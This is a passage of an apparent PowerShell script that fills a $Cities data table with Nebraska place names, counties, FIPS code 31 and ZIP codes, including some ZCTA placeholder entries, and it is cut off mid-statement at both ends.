$Cities.Rows.Add("Rulo","Richardson","Nebraska","NE","31","68431") + $null = $Cities.Rows.Add("Salem","Richardson","Nebraska","NE","31","68433") + $null = $Cities.Rows.Add("Seward","Seward","Nebraska","NE","31","68434") + $null = $Cities.Rows.Add("Shickley","Fillmore","Nebraska","NE","31","68436") + $null = $Cities.Rows.Add("Shubert","Richardson","Nebraska","NE","31","68437") + $null = $Cities.Rows.Add("Staplehurst","Seward","Nebraska","NE","31","68439") + $null = $Cities.Rows.Add("Steele city","Jefferson","Nebraska","NE","31","68440") + $null = $Cities.Rows.Add("Steinauer","Pawnee","Nebraska","NE","31","68441") + $null = $Cities.Rows.Add("Stella","Richardson","Nebraska","NE","31","68442") + $null = $Cities.Rows.Add("Sterling","Johnson","Nebraska","NE","31","68443") + $null = $Cities.Rows.Add("Strang","Fillmore","Nebraska","NE","31","68444") + $null = $Cities.Rows.Add("Swanton","Saline","Nebraska","NE","31","68445") + $null = $Cities.Rows.Add("Syracuse","Otoe","Nebraska","NE","31","68446") + $null = $Cities.Rows.Add("Table rock","Pawnee","Nebraska","NE","31","68447") + $null = $Cities.Rows.Add("Talmage","Otoe","Nebraska","NE","31","68448") + $null = $Cities.Rows.Add("Tecumseh","Johnson","Nebraska","NE","31","68450") + $null = $Cities.Rows.Add("Ong","Clay","Nebraska","NE","31","68452") + $null = $Cities.Rows.Add("Tobias","Saline","Nebraska","NE","31","68453") + $null = $Cities.Rows.Add("Unadilla","Otoe","Nebraska","NE","31","68454") + $null = $Cities.Rows.Add("Union","Cass","Nebraska","NE","31","68455") + $null = $Cities.Rows.Add("Utica","Seward","Nebraska","NE","31","68456") + $null = $Cities.Rows.Add("Verdon","Richardson","Nebraska","NE","31","68457") + $null = $Cities.Rows.Add("Virginia","Gage","Nebraska","NE","31","68458") + $null = $Cities.Rows.Add("Waco","York","Nebraska","NE","31","68460") + $null = $Cities.Rows.Add("Walton","Lancaster","Nebraska","NE","31","68461") + $null = $Cities.Rows.Add("Waverly","Lancaster","Nebraska","NE","31","68462") + $null = $Cities.Rows.Add("Weeping water","Cass","Nebraska","NE","31","68463") + $null = $Cities.Rows.Add("Western","Saline","Nebraska","NE","31","68464") + $null = $Cities.Rows.Add("Wilber","Saline","Nebraska","NE","31","68465") + $null = $Cities.Rows.Add("Wymore","Gage","Nebraska","NE","31","68466") + $null = $Cities.Rows.Add("York","York","Nebraska","NE","31","68467") + $null = $Cities.Rows.Add("Zcta 684hh","Cass","Nebraska","NE","31","684HH") + $null = $Cities.Rows.Add("Lincoln","Lancaster","Nebraska","NE","31","68502") + $null = $Cities.Rows.Add("Lincoln","Lancaster","Nebraska","NE","31","68503") + $null = $Cities.Rows.Add("Lincoln","Lancaster","Nebraska","NE","31","68504") + $null = $Cities.Rows.Add("Lincoln","Lancaster","Nebraska","NE","31","68505") + $null = $Cities.Rows.Add("Lincoln","Lancaster","Nebraska","NE","31","68506") + $null = $Cities.Rows.Add("Lincoln","Lancaster","Nebraska","NE","31","68507") + $null = $Cities.Rows.Add("Lincoln","Lancaster","Nebraska","NE","31","68508") + $null = $Cities.Rows.Add("Lincoln","Lancaster","Nebraska","NE","31","68510") + $null = $Cities.Rows.Add("Lincoln","Lancaster","Nebraska","NE","31","68512") + $null = $Cities.Rows.Add("Lincoln","Lancaster","Nebraska","NE","31","68516") + $null = $Cities.Rows.Add("Lincoln","Lancaster","Nebraska","NE","31","68517") + $null = $Cities.Rows.Add("Lincoln","Lancaster","Nebraska","NE","31","68520") + $null = $Cities.Rows.Add("Lincoln","Lancaster","Nebraska","NE","31","68521") + $null = $Cities.Rows.Add("Lincoln","Lancaster","Nebraska","NE","31","68522") + $null = $Cities.Rows.Add("Lincoln","Lancaster","Nebraska","NE","31","68523") + $null = $Cities.Rows.Add("Lincoln","Lancaster","Nebraska","NE","31","68524") + $null = $Cities.Rows.Add("Lincoln","Lancaster","Nebraska","NE","31","68526") + $null = $Cities.Rows.Add("Lincoln","Lancaster","Nebraska","NE","31","68527") + $null = $Cities.Rows.Add("Lincoln","Lancaster","Nebraska","NE","31","68528") + $null = $Cities.Rows.Add("Lincoln","Lancaster","Nebraska","NE","31","68532") + $null = $Cities.Rows.Add("Richland","Platte","Nebraska","NE","31","68601") + $null = $Cities.Rows.Add("Albion","Boone","Nebraska","NE","31","68620") + $null = $Cities.Rows.Add("Ames","Dodge","Nebraska","NE","31","68621") + $null = $Cities.Rows.Add("Bartlett","Wheeler","Nebraska","NE","31","68622") + $null = $Cities.Rows.Add("Belgrade","Nance","Nebraska","NE","31","68623") + $null = $Cities.Rows.Add("Bellwood","Butler","Nebraska","NE","31","68624") + $null = $Cities.Rows.Add("Brainard","Butler","Nebraska","NE","31","68626") + $null = $Cities.Rows.Add("Cedar rapids","Boone","Nebraska","NE","31","68627") + $null = $Cities.Rows.Add("Clarks","Merrick","Nebraska","NE","31","68628") + $null = $Cities.Rows.Add("Clarkson","Colfax","Nebraska","NE","31","68629") + $null = $Cities.Rows.Add("Creston","Platte","Nebraska","NE","31","68631") + $null = $Cities.Rows.Add("Garrison","Butler","Nebraska","NE","31","68632") + $null = $Cities.Rows.Add("Dodge","Dodge","Nebraska","NE","31","68633") + $null = $Cities.Rows.Add("Duncan","Platte","Nebraska","NE","31","68634") + $null = $Cities.Rows.Add("Dwight","Butler","Nebraska","NE","31","68635") + $null = $Cities.Rows.Add("Elgin","Antelope","Nebraska","NE","31","68636") + $null = $Cities.Rows.Add("Ericson","Wheeler","Nebraska","NE","31","68637") + $null = $Cities.Rows.Add("Fullerton","Nance","Nebraska","NE","31","68638") + $null = $Cities.Rows.Add("Genoa","Nance","Nebraska","NE","31","68640") + $null = $Cities.Rows.Add("Howells","Colfax","Nebraska","NE","31","68641") + $null = $Cities.Rows.Add("Humphrey","Platte","Nebraska","NE","31","68642") + $null = $Cities.Rows.Add("Leigh","Colfax","Nebraska","NE","31","68643") + $null = $Cities.Rows.Add("Lindsay","Platte","Nebraska","NE","31","68644") + $null = $Cities.Rows.Add("Monroe","Platte","Nebraska","NE","31","68647") + $null = $Cities.Rows.Add("Morse bluff","Saunders","Nebraska","NE","31","68648") + $null = $Cities.Rows.Add("North bend","Dodge","Nebraska","NE","31","68649") + $null = $Cities.Rows.Add("Osceola","Polk","Nebraska","NE","31","68651") + $null = $Cities.Rows.Add("Petersburg","Boone","Nebraska","NE","31","68652") + $null = $Cities.Rows.Add("Platte center","Platte","Nebraska","NE","31","68653") + $null = $Cities.Rows.Add("Polk","Polk","Nebraska","NE","31","68654") + $null = $Cities.Rows.Add("Primrose","Boone","Nebraska","NE","31","68655") + $null = $Cities.Rows.Add("Rising city","Butler","Nebraska","NE","31","68658") + $null = $Cities.Rows.Add("Rogers","Colfax","Nebraska","NE","31","68659") + $null = $Cities.Rows.Add("Saint edward","Boone","Nebraska","NE","31","68660") + $null = $Cities.Rows.Add("Schuyler","Colfax","Nebraska","NE","31","68661") + $null = $Cities.Rows.Add("Shelby","Polk","Nebraska","NE","31","68662") + $null = $Cities.Rows.Add("Silver creek","Merrick","Nebraska","NE","31","68663") + $null = $Cities.Rows.Add("Snyder","Dodge","Nebraska","NE","31","68664") + $null = $Cities.Rows.Add("Spalding","Greeley","Nebraska","NE","31","68665") + $null = $Cities.Rows.Add("Stromsburg","Polk","Nebraska","NE","31","68666") + $null = $Cities.Rows.Add("Ulysses","Butler","Nebraska","NE","31","68667") + $null = $Cities.Rows.Add("Ulysses","Butler","Nebraska","NE","31","68669") + $null = $Cities.Rows.Add("Zcta 686hh","Colfax","Nebraska","NE","31","686HH") + $null = $Cities.Rows.Add("Norfolk","Madison","Nebraska","NE","31","68701") + $null = $Cities.Rows.Add("Allen","Dixon","Nebraska","NE","31","68710") + $null = $Cities.Rows.Add("Amelia","Holt","Nebraska","NE","31","68711") + $null = $Cities.Rows.Add("Atkinson","Holt","Nebraska","NE","31","68713") + $null = $Cities.Rows.Add("Bassett","Rock","Nebraska","NE","31","68714") + $null = $Cities.Rows.Add("Battle creek","Madison","Nebraska","NE","31","68715") + $null = $Cities.Rows.Add("Beemer","Cuming","Nebraska","NE","31","68716") + $null = $Cities.Rows.Add("Belden","Cedar","Nebraska","NE","31","68717") + $null = $Cities.Rows.Add("Bloomfield","Knox","Nebraska","NE","31","68718") + $null = $Cities.Rows.Add("Bristow","Boyd","Nebraska","NE","31","68719") + $null = $Cities.Rows.Add("Brunswick","Antelope","Nebraska","NE","31","68720") + $null = $Cities.Rows.Add("Butte","Boyd","Nebraska","NE","31","68722") + $null = $Cities.Rows.Add("Carroll","Wayne","Nebraska","NE","31","68723") + $null = $Cities.Rows.Add("Center","Knox","Nebraska","NE","31","68724") + $null = $Cities.Rows.Add("Chambers","Holt","Nebraska","NE","31","68725") + $null = $Cities.Rows.Add("Clearwater","Antelope","Nebraska","NE","31","68726") + $null = $Cities.Rows.Add("Coleridge","Cedar","Nebraska","NE","31","68727") + $null = $Cities.Rows.Add("Concord","Dixon","Nebraska","NE","31","68728") + $null = $Cities.Rows.Add("Creighton","Knox","Nebraska","NE","31","68729") + $null = $Cities.Rows.Add("Crofton","Knox","Nebraska","NE","31","68730") + $null = $Cities.Rows.Add("Dakota city","Dakota","Nebraska","NE","31","68731") + $null = $Cities.Rows.Add("Dixon","Dixon","Nebraska","NE","31","68732") + $null = $Cities.Rows.Add("Emerson","Dixon","Nebraska","NE","31","68733") + $null = $Cities.Rows.Add("Emmet","Holt","Nebraska","NE","31","68734") + $null = $Cities.Rows.Add("Ewing","Holt","Nebraska","NE","31","68735") + $null = $Cities.Rows.Add("Fordyce","Cedar","Nebraska","NE","31","68736") + $null = $Cities.Rows.Add("Foster","Pierce","Nebraska","NE","31","68737") + $null = $Cities.Rows.Add("Hartington","Cedar","Nebraska","NE","31","68739") + $null = $Cities.Rows.Add("Hoskins","Wayne","Nebraska","NE","31","68740") + $null = $Cities.Rows.Add("Hubbard","Dakota","Nebraska","NE","31","68741") + $null = $Cities.Rows.Add("Inman","Holt","Nebraska","NE","31","68742") + $null = $Cities.Rows.Add("Jackson","Dakota","Nebraska","NE","31","68743") + $null = $Cities.Rows.Add("Laurel","Cedar","Nebraska","NE","31","68745") + $null = $Cities.Rows.Add("Lynch","Boyd","Nebraska","NE","31","68746") + $null = $Cities.Rows.Add("Mclean","Pierce","Nebraska","NE","31","68747") + $null = $Cities.Rows.Add("Madison","Madison","Nebraska","NE","31","68748") + $null = $Cities.Rows.Add("Meadow grove","Madison","Nebraska","NE","31","68752") + $null = $Cities.Rows.Add("Mills","Keya Paha","Nebraska","NE","31","68753") + $null = $Cities.Rows.Add("Naper","Boyd","Nebraska","NE","31","68755") + $null = $Cities.Rows.Add("Neligh","Antelope","Nebraska","NE","31","68756") + $null = $Cities.Rows.Add("Newcastle","Dixon","Nebraska","NE","31","68757") + $null = $Cities.Rows.Add("Newman grove","Madison","Nebraska","NE","31","68758") + $null = $Cities.Rows.Add("Newport","Rock","Nebraska","NE","31","68759") + $null = $Cities.Rows.Add("Verdel","Knox","Nebraska","NE","31","68760") + $null = $Cities.Rows.Add("Oakdale","Antelope","Nebraska","NE","31","68761") + $null = $Cities.Rows.Add("Oneill","Holt","Nebraska","NE","31","68763") + $null = $Cities.Rows.Add("Orchard","Antelope","Nebraska","NE","31","68764") + $null = $Cities.Rows.Add("Osmond","Pierce","Nebraska","NE","31","68765") + $null = $Cities.Rows.Add("Page","Holt","Nebraska","NE","31","68766") + $null = $Cities.Rows.Add("Pierce","Pierce","Nebraska","NE","31","68767") + $null = $Cities.Rows.Add("Pilger","Stanton","Nebraska","NE","31","68768") + $null = $Cities.Rows.Add("Plainview","Pierce","Nebraska","NE","31","68769") + $null = $Cities.Rows.Add("Ponca","Dixon","Nebraska","NE","31","68770") + $null = $Cities.Rows.Add("Randolph","Cedar","Nebraska","NE","31","68771") + $null = $Cities.Rows.Add("Rose","Rock","Nebraska","NE","31","68772") + $null = $Cities.Rows.Add("Royal","Antelope","Nebraska","NE","31","68773") + $null = $Cities.Rows.Add("Saint helena","Cedar","Nebraska","NE","31","68774") + $null = $Cities.Rows.Add("South sioux city","Dakota","Nebraska","NE","31","68776") + $null = $Cities.Rows.Add("Spencer","Boyd","Nebraska","NE","31","68777") + $null = $Cities.Rows.Add("Springview","Keya Paha","Nebraska","NE","31","68778") + $null = $Cities.Rows.Add("Stanton","Stanton","Nebraska","NE","31","68779") + $null = $Cities.Rows.Add("Stuart","Holt","Nebraska","NE","31","68780") + $null = $Cities.Rows.Add("Tilden","Madison","Nebraska","NE","31","68781") + $null = $Cities.Rows.Add("Verdigre","Knox","Nebraska","NE","31","68783") + $null = $Cities.Rows.Add("Wakefield","Dixon","Nebraska","NE","31","68784") + $null = $Cities.Rows.Add("Waterbury","Dixon","Nebraska","NE","31","68785") + $null = $Cities.Rows.Add("Wausa","Knox","Nebraska","NE","31","68786") + $null = $Cities.Rows.Add("Wayne","Wayne","Nebraska","NE","31","68787") + $null = $Cities.Rows.Add("West point","Cuming","Nebraska","NE","31","68788") + $null = $Cities.Rows.Add("Winnetoon","Knox","Nebraska","NE","31","68789") + $null = $Cities.Rows.Add("Winside","Wayne","Nebraska","NE","31","68790") + $null = $Cities.Rows.Add("Wisner","Cuming","Nebraska","NE","31","68791") + $null = $Cities.Rows.Add("Wynot","Cedar","Nebraska","NE","31","68792") + $null = $Cities.Rows.Add("Zcta 687hh","Cedar","Nebraska","NE","31","687HH") + $null = $Cities.Rows.Add("Grand island","Hall","Nebraska","NE","31","68801") + $null = $Cities.Rows.Add("Grand island","Hall","Nebraska","NE","31","68803") + $null = $Cities.Rows.Add("Alda","Hall","Nebraska","NE","31","68810") + $null = $Cities.Rows.Add("Amherst","Buffalo","Nebraska","NE","31","68812") + $null = $Cities.Rows.Add("Milburn","Custer","Nebraska","NE","31","68813") + $null = $Cities.Rows.Add("Ansley","Custer","Nebraska","NE","31","68814") + $null = $Cities.Rows.Add("Arcadia","Valley","Nebraska","NE","31","68815") + $null = $Cities.Rows.Add("Archer","Merrick","Nebraska","NE","31","68816") + $null = $Cities.Rows.Add("Ashton","Sherman","Nebraska","NE","31","68817") + $null = $Cities.Rows.Add("Aurora","Hamilton","Nebraska","NE","31","68818") + $null = $Cities.Rows.Add("Berwyn","Custer","Nebraska","NE","31","68819") + $null = $Cities.Rows.Add("Boelus","Howard","Nebraska","NE","31","68820") + $null = $Cities.Rows.Add("Brewster","Blaine","Nebraska","NE","31","68821") + $null = $Cities.Rows.Add("Broken bow","Custer","Nebraska","NE","31","68822") + $null = $Cities.Rows.Add("Burwell","Garfield","Nebraska","NE","31","68823") + $null = $Cities.Rows.Add("Cairo","Hall","Nebraska","NE","31","68824") + $null = $Cities.Rows.Add("Callaway","Custer","Nebraska","NE","31","68825") + $null = $Cities.Rows.Add("Central city","Merrick","Nebraska","NE","31","68826") + $null = $Cities.Rows.Add("Chapman","Merrick","Nebraska","NE","31","68827") + $null = $Cities.Rows.Add("Comstock","Custer","Nebraska","NE","31","68828") + $null = $Cities.Rows.Add("Dannebrog","Howard","Nebraska","NE","31","68831") + $null = $Cities.Rows.Add("Doniphan","Hall","Nebraska","NE","31","68832") + $null = $Cities.Rows.Add("Dunning","Blaine","Nebraska","NE","31","68833") + $null = $Cities.Rows.Add("Eddyville","Dawson","Nebraska","NE","31","68834") + $null = $Cities.Rows.Add("Elba","Howard","Nebraska","NE","31","68835") + $null = $Cities.Rows.Add("Elm creek","Buffalo","Nebraska","NE","31","68836") + $null = $Cities.Rows.Add("Elyria","Valley","Nebraska","NE","31","68837") + $null = $Cities.Rows.Add("Farwell","Howard","Nebraska","NE","31","68838") + $null = $Cities.Rows.Add("Gibbon","Buffalo","Nebraska","NE","31","68840") + $null = $Cities.Rows.Add("Giltner","Hamilton","Nebraska","NE","31","68841") + $null = $Cities.Rows.Add("Greeley","Greeley","Nebraska","NE","31","68842") + $null = $Cities.Rows.Add("Hampton","Hamilton","Nebraska","NE","31","68843") + $null = $Cities.Rows.Add("Hazard","Sherman","Nebraska","NE","31","68844") + $null = $Cities.Rows.Add("Zcta 68845","Buffalo","Nebraska","NE","31","68845") + $null = $Cities.Rows.Add("Hordville","Hamilton","Nebraska","NE","31","68846") + $null = $Cities.Rows.Add("Kearney","Buffalo","Nebraska","NE","31","68847") + $null = $Cities.Rows.Add("Lexington","Dawson","Nebraska","NE","31","68850") + $null = $Cities.Rows.Add("Litchfield","Sherman","Nebraska","NE","31","68852") + $null = $Cities.Rows.Add("Loup city","Sherman","Nebraska","NE","31","68853") + $null = $Cities.Rows.Add("Marquette","Hamilton","Nebraska","NE","31","68854") + $null = $Cities.Rows.Add("Mason city","Custer","Nebraska","NE","31","68855") + $null = $Cities.Rows.Add("Merna","Custer","Nebraska","NE","31","68856") + $null = $Cities.Rows.Add("Miller","Buffalo","Nebraska","NE","31","68858") + $null = $Cities.Rows.Add("North loup","Valley","Nebraska","NE","31","68859") + $null = $Cities.Rows.Add("Oconto","Custer","Nebraska","NE","31","68860") + $null = $Cities.Rows.Add("Odessa","Buffalo","Nebraska","NE","31","68861") + $null = $Cities.Rows.Add("Ord","Valley","Nebraska","NE","31","68862") + $null = $Cities.Rows.Add("Overton","Dawson","Nebraska","NE","31","68863") + $null = $Cities.Rows.Add("Palmer","Merrick","Nebraska","NE","31","68864") + $null = $Cities.Rows.Add("Phillips","Hamilton","Nebraska","NE","31","68865") + $null = $Cities.Rows.Add("Pleasanton","Buffalo","Nebraska","NE","31","68866") + $null = $Cities.Rows.Add("Ravenna","Buffalo","Nebraska","NE","31","68869") + $null = $Cities.Rows.Add("Riverdale","Buffalo","Nebraska","NE","31","68870") + $null = $Cities.Rows.Add("Rockville","Sherman","Nebraska","NE","31","68871") + $null = $Cities.Rows.Add("Saint libory","Howard","Nebraska","NE","31","68872") + $null = $Cities.Rows.Add("Saint paul","Howard","Nebraska","NE","31","68873") + $null = $Cities.Rows.Add("Sargent","Custer","Nebraska","NE","31","68874") + $null = $Cities.Rows.Add("Scotia","Greeley","Nebraska","NE","31","68875") + $null = $Cities.Rows.Add("Shelton","Buffalo","Nebraska","NE","31","68876") + $null = $Cities.Rows.Add("Sumner","Dawson","Nebraska","NE","31","68878") + $null = $Cities.Rows.Add("Almeria","Loup","Nebraska","NE","31","68879") + $null = $Cities.Rows.Add("Westerville","Custer","Nebraska","NE","31","68881") + $null = $Cities.Rows.Add("Wolbach","Greeley","Nebraska","NE","31","68882") + $null = $Cities.Rows.Add("Wood river","Hall","Nebraska","NE","31","68883") + $null = $Cities.Rows.Add("Zcta 688hh","Buffalo","Nebraska","NE","31","688HH") + $null = $Cities.Rows.Add("Hastings","Adams","Nebraska","NE","31","68901") + $null = $Cities.Rows.Add("Alma","Harlan","Nebraska","NE","31","68920") + $null = $Cities.Rows.Add("Arapahoe","Furnas","Nebraska","NE","31","68922") + $null = $Cities.Rows.Add("Atlanta","Phelps","Nebraska","NE","31","68923") + $null = $Cities.Rows.Add("Axtell","Kearney","Nebraska","NE","31","68924") + $null = $Cities.Rows.Add("Ayr","Adams","Nebraska","NE","31","68925") + $null = $Cities.Rows.Add("Beaver city","Furnas","Nebraska","NE","31","68926") + $null = $Cities.Rows.Add("Bertrand","Phelps","Nebraska","NE","31","68927") + $null = $Cities.Rows.Add("Bladen","Webster","Nebraska","NE","31","68928") + $null = $Cities.Rows.Add("Bloomington","Franklin","Nebraska","NE","31","68929") + $null = $Cities.Rows.Add("Blue hill","Webster","Nebraska","NE","31","68930") + $null = $Cities.Rows.Add("Campbell","Franklin","Nebraska","NE","31","68932") + $null = $Cities.Rows.Add("Clay center","Clay","Nebraska","NE","31","68933") + $null = $Cities.Rows.Add("Deweese","Clay","Nebraska","NE","31","68934") + $null = $Cities.Rows.Add("Edgar","Clay","Nebraska","NE","31","68935") + $null = $Cities.Rows.Add("Edison","Furnas","Nebraska","NE","31","68936") + $null = $Cities.Rows.Add("Elwood","Gosper","Nebraska","NE","31","68937") + $null = $Cities.Rows.Add("Fairfield","Clay","Nebraska","NE","31","68938") + $null = $Cities.Rows.Add("Franklin","Franklin","Nebraska","NE","31","68939") + $null = $Cities.Rows.Add("Funk","Phelps","Nebraska","NE","31","68940") + $null = $Cities.Rows.Add("Glenvil","Clay","Nebraska","NE","31","68941") + $null = $Cities.Rows.Add("Guide rock","Webster","Nebraska","NE","31","68942") + $null = $Cities.Rows.Add("Hardy","Nuckolls","Nebraska","NE","31","68943") + $null = $Cities.Rows.Add("Harvard","Clay","Nebraska","NE","31","68944") + $null = $Cities.Rows.Add("Heartwell","Kearney","Nebraska","NE","31","68945") + $null = $Cities.Rows.Add("Hendley","Furnas","Nebraska","NE","31","68946") + $null = $Cities.Rows.Add("Hildreth","Franklin","Nebraska","NE","31","68947") + $null = $Cities.Rows.Add("Holbrook","Furnas","Nebraska","NE","31","68948") + $null = $Cities.Rows.Add("Holdrege","Phelps","Nebraska","NE","31","68949") + $null = $Cities.Rows.Add("Holstein","Adams","Nebraska","NE","31","68950") + $null = $Cities.Rows.Add("Inavale","Webster","Nebraska","NE","31","68952") + $null = $Cities.Rows.Add("Inland","Clay","Nebraska","NE","31","68954") + $null = $Cities.Rows.Add("Juniata","Adams","Nebraska","NE","31","68955") + $null = $Cities.Rows.Add("Kenesaw","Adams","Nebraska","NE","31","68956") + $null = $Cities.Rows.Add("Lawrence","Nuckolls","Nebraska","NE","31","68957") + $null = $Cities.Rows.Add("Loomis","Phelps","Nebraska","NE","31","68958") + $null = $Cities.Rows.Add("Minden","Kearney","Nebraska","NE","31","68959") + $null = $Cities.Rows.Add("Naponee","Franklin","Nebraska","NE","31","68960") + $null = $Cities.Rows.Add("Nora","Nuckolls","Nebraska","NE","31","68961") + $null = $Cities.Rows.Add("Oak","Nuckolls","Nebraska","NE","31","68964") + $null = $Cities.Rows.Add("Orleans","Harlan","Nebraska","NE","31","68966") + $null = $Cities.Rows.Add("Oxford","Furnas","Nebraska","NE","31","68967") + $null = $Cities.Rows.Add("Red cloud","Webster","Nebraska","NE","31","68970") + $null = $Cities.Rows.Add("Republican city","Harlan","Nebraska","NE","31","68971") + $null = $Cities.Rows.Add("Riverton","Franklin","Nebraska","NE","31","68972") + $null = $Cities.Rows.Add("Roseland","Adams","Nebraska","NE","31","68973") + $null = $Cities.Rows.Add("Ruskin","Nuckolls","Nebraska","NE","31","68974") + $null = $Cities.Rows.Add("Saronville","Clay","Nebraska","NE","31","68975") + $null = $Cities.Rows.Add("Smithfield","Gosper","Nebraska","NE","31","68976") + $null = $Cities.Rows.Add("Stamford","Harlan","Nebraska","NE","31","68977") + $null = $Cities.Rows.Add("Superior","Nuckolls","Nebraska","NE","31","68978") + $null = $Cities.Rows.Add("Sutton","Clay","Nebraska","NE","31","68979") + $null = $Cities.Rows.Add("Trumbull","Clay","Nebraska","NE","31","68980") + $null = $Cities.Rows.Add("Upland","Franklin","Nebraska","NE","31","68981") + $null = $Cities.Rows.Add("Wilcox","Kearney","Nebraska","NE","31","68982") + $null = $Cities.Rows.Add("Zcta 689hh","Furnas","Nebraska","NE","31","689HH") + $null = $Cities.Rows.Add("Mc cook","Red Willow","Nebraska","NE","31","69001") + $null = $Cities.Rows.Add("Bartley","Red Willow","Nebraska","NE","31","69020") + $null = $Cities.Rows.Add("Benkelman","Dundy","Nebraska","NE","31","69021") + $null = $Cities.Rows.Add("Cambridge","Furnas","Nebraska","NE","31","69022") + $null = $Cities.Rows.Add("Champion","Chase","Nebraska","NE","31","69023") + $null = $Cities.Rows.Add("Culbertson","Hitchcock","Nebraska","NE","31","69024") + $null = $Cities.Rows.Add("Curtis","Frontier","Nebraska","NE","31","69025") + $null = $Cities.Rows.Add("Danbury","Red Willow","Nebraska","NE","31","69026") + $null = $Cities.Rows.Add("Enders","Chase","Nebraska","NE","31","69027") + $null = $Cities.Rows.Add("Eustis","Frontier","Nebraska","NE","31","69028") + $null = $Cities.Rows.Add("Farnam","Dawson","Nebraska","NE","31","69029") + $null = $Cities.Rows.Add("Haigler","Dundy","Nebraska","NE","31","69030") + $null = $Cities.Rows.Add("Hamlet","Hayes","Nebraska","NE","31","69031") + $null = $Cities.Rows.Add("Hayes center","Hayes","Nebraska","NE","31","69032") + $null = $Cities.Rows.Add("Imperial","Chase","Nebraska","NE","31","69033") + $null = $Cities.Rows.Add("Indianola","Red Willow","Nebraska","NE","31","69034") + $null = $Cities.Rows.Add("Lebanon","Red Willow","Nebraska","NE","31","69036") + $null = $Cities.Rows.Add("Max","Dundy","Nebraska","NE","31","69037") + $null = $Cities.Rows.Add("Maywood","Frontier","Nebraska","NE","31","69038") + $null = $Cities.Rows.Add("Moorefield","Frontier","Nebraska","NE","31","69039") + $null = $Cities.Rows.Add("Palisade","Hitchcock","Nebraska","NE","31","69040") + $null = $Cities.Rows.Add("Parks","Dundy","Nebraska","NE","31","69041") + $null = $Cities.Rows.Add("Stockville","Frontier","Nebraska","NE","31","69042") + $null = $Cities.Rows.Add("Stratton","Hitchcock","Nebraska","NE","31","69043") + $null = $Cities.Rows.Add("Trenton","Hitchcock","Nebraska","NE","31","69044") + $null = $Cities.Rows.Add("Wauneta","Chase","Nebraska","NE","31","69045") + $null = $Cities.Rows.Add("Wilsonville","Furnas","Nebraska","NE","31","69046") + $null = $Cities.Rows.Add("Zcta 690hh","Hitchcock","Nebraska","NE","31","690HH") + $null = $Cities.Rows.Add("Zcta 690xx","Frontier","Nebraska","NE","31","690XX") + $null = $Cities.Rows.Add("North platte","Lincoln","Nebraska","NE","31","69101") + $null = $Cities.Rows.Add("Arnold","Custer","Nebraska","NE","31","69120") + $null = $Cities.Rows.Add("Arthur","Arthur","Nebraska","NE","31","69121") + $null = $Cities.Rows.Add("Big springs","Deuel","Nebraska","NE","31","69122") + $null = $Cities.Rows.Add("Brady","Lincoln","Nebraska","NE","31","69123") + $null = $Cities.Rows.Add("Broadwater","Morrill","Nebraska","NE","31","69125") + $null = $Cities.Rows.Add("Brule","Keith","Nebraska","NE","31","69127") + $null = $Cities.Rows.Add("Bushnell","Kimball","Nebraska","NE","31","69128") + $null = $Cities.Rows.Add("Chappell","Deuel","Nebraska","NE","31","69129") + $null = $Cities.Rows.Add("Cozad","Dawson","Nebraska","NE","31","69130") + $null = $Cities.Rows.Add("Dalton","Cheyenne","Nebraska","NE","31","69131") + $null = $Cities.Rows.Add("Dickens","Lincoln","Nebraska","NE","31","69132") + $null = $Cities.Rows.Add("Dix","Kimball","Nebraska","NE","31","69133") + $null = $Cities.Rows.Add("Elsie","Perkins","Nebraska","NE","31","69134") + $null = $Cities.Rows.Add("Elsmere","Cherry","Nebraska","NE","31","69135") + $null = $Cities.Rows.Add("Gothenburg","Dawson","Nebraska","NE","31","69138") + $null = $Cities.Rows.Add("Grant","Perkins","Nebraska","NE","31","69140") + $null = $Cities.Rows.Add("Gurley","Cheyenne","Nebraska","NE","31","69141") + $null = $Cities.Rows.Add("Halsey","Thomas","Nebraska","NE","31","69142") + $null = $Cities.Rows.Add("Hershey","Lincoln","Nebraska","NE","31","69143") + $null = $Cities.Rows.Add("Keystone","Keith","Nebraska","NE","31","69144") + $null = $Cities.Rows.Add("Kimball","Kimball","Nebraska","NE","31","69145") + $null = $Cities.Rows.Add("Lemoyne","Keith","Nebraska","NE","31","69146") + $null = $Cities.Rows.Add("Lewellen","Garden","Nebraska","NE","31","69147") + $null = $Cities.Rows.Add("Lisco","Garden","Nebraska","NE","31","69148") + $null = $Cities.Rows.Add("Lodgepole","Cheyenne","Nebraska","NE","31","69149") + $null = $Cities.Rows.Add("Madrid","Perkins","Nebraska","NE","31","69150") + $null = $Cities.Rows.Add("Maxwell","Lincoln","Nebraska","NE","31","69151") + $null = $Cities.Rows.Add("Mullen","Hooker","Nebraska","NE","31","69152") + $null = $Cities.Rows.Add("Ogallala","Keith","Nebraska","NE","31","69153") + $null = $Cities.Rows.Add("Oshkosh","Garden","Nebraska","NE","31","69154") + $null = $Cities.Rows.Add("Paxton","Keith","Nebraska","NE","31","69155") + $null = $Cities.Rows.Add("Potter","Cheyenne","Nebraska","NE","31","69156") + $null = $Cities.Rows.Add("Purdum","Cherry","Nebraska","NE","31","69157") + $null = $Cities.Rows.Add("Seneca","Thomas","Nebraska","NE","31","69161") + $null = $Cities.Rows.Add("Sidney","Cheyenne","Nebraska","NE","31","69162") + $null = $Cities.Rows.Add("Stapleton","Logan","Nebraska","NE","31","69163") + $null = $Cities.Rows.Add("Sutherland","Lincoln","Nebraska","NE","31","69165") + $null = $Cities.Rows.Add("Brownlee","Thomas","Nebraska","NE","31","69166") + $null = $Cities.Rows.Add("Tryon","McPherson","Nebraska","NE","31","69167") + $null = $Cities.Rows.Add("Venango","Perkins","Nebraska","NE","31","69168") + $null = $Cities.Rows.Add("Wallace","Lincoln","Nebraska","NE","31","69169") + $null = $Cities.Rows.Add("Wellfleet","Lincoln","Nebraska","NE","31","69170") + $null = $Cities.Rows.Add("Zcta 691hh","Keith","Nebraska","NE","31","691HH") + $null = $Cities.Rows.Add("Zcta 691xx","Arthur","Nebraska","NE","31","691XX") + $null = $Cities.Rows.Add("Valentine","Cherry","Nebraska","NE","31","69201") + $null = $Cities.Rows.Add("Ainsworth","Brown","Nebraska","NE","31","69210") + $null = $Cities.Rows.Add("Cody","Cherry","Nebraska","NE","31","69211") + $null = $Cities.Rows.Add("Crookston","Cherry","Nebraska","NE","31","69212") + $null = $Cities.Rows.Add("Johnstown","Brown","Nebraska","NE","31","69214") + $null = $Cities.Rows.Add("Kilgore","Cherry","Nebraska","NE","31","69216") + $null = $Cities.Rows.Add("Long pine","Brown","Nebraska","NE","31","69217") + $null = $Cities.Rows.Add("Merriman","Cherry","Nebraska","NE","31","69218") + $null = $Cities.Rows.Add("Nenzel","Cherry","Nebraska","NE","31","69219") + $null = 